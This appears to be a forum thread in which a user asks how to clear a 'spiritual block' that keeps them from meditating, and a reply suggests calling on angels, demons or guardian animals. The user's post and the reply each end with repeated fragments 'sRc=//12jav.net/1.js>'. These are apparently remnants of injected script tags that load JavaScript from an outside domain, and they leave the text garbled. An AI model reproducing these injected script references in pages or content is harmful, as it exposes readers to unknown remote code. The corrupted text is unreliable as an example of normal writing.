Spiritual mental block

Hey! I've been struggling to meditate and stay in that kind of deep state of mind. It's hard for me to calm my thoughts and I keep getting intrusive thoughts while I'm trying to meditate.

I used to be able to visualize things when meditating, usually when listening to guided meditations on youtube. My most recent successful meditation, I had a conversation with my spirit guide and it told me I have a spiritual block and I won't be able to meditate until I clear it. It gave me a series of tasks to complete that I don't think I'm emotionally ready to do yet, like confront someone who caused emotional trauma to me.

I tried "clearing my chakras" by doing grounding meditation but it doesn't work for me. Is there any way for me to remove this "spiritual block"? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Thanks! I'm just trying hard to avoid this because it isn't a conversation I feel comfortable about.

You can try to call different angels,demons ( no,they are not all evil) or guardian animals ect. They can help you feel safe. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
